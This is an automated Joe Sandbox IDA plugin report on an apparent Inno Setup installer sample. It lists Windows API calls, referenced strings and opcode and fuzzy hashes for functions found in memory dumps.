                                                                                                      • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                      • API String ID: 2906209438-2320870614
                                                                                                      • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                      • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                      • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                      • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2492108670-2683653824
                                                                                                      • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                      • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                      • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                      • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                      APIs
                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574300362-0
                                                                                                      • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                      • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                      • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                      • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 1489644407-0
                                                                                                      • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                      • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                      • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                      • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                      APIs
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                      • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                      • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4217535847-0
                                                                                                      • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                      • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                      • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                      • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                      APIs
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Prop$Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 3363284559-0
                                                                                                      • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                      • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                      • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                      • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3234591441-0
                                                                                                      • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                      • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                      • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                      • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: PrepareToInstall
                                                                                                      • API String ID: 2558294473-1101760603
                                                                                                      • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                      • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                      • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                      • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /:*?"<>|
                                                                                                      • API String ID: 0-4078764451
                                                                                                      • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                      • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                      • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                      • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: InitializeWizard
                                                                                                      • API String ID: 2558294473-2356795471
                                                                                                      • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                      • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                      • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                      • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                      • API String ID: 47109696-1019749484
                                                                                                      • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                      • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                      • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                      • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                      Strings
                                                                                                      • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: Inno Setup: Setup Version
                                                                                                      • API String ID: 3702945584-4166306022
                                                                                                      • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                      • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                      • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                      • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                      APIs
                                                                                                      • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID: NoModify
                                                                                                      • API String ID: 3702945584-1699962838
                                                                                                      • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                      • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                      • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                      • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                        • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                        • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                        • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                      • SendNotifyMessageA.USER32(00010434,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2649214853-0
                                                                                                      • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                      • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                      • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                      • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                        • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMetricsMultiSystemWide
                                                                                                      • String ID: /G
                                                                                                      • API String ID: 224039744-2088674125
                                                                                                      • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                      • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                      • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                      • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                      APIs
                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                      • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseEnum
                                                                                                      • String ID:
                                                                                                      • API String ID: 2818636725-0
                                                                                                      • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                      • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                      • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                      • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2919029540-0
                                                                                                      • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                      • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                      • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                      • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
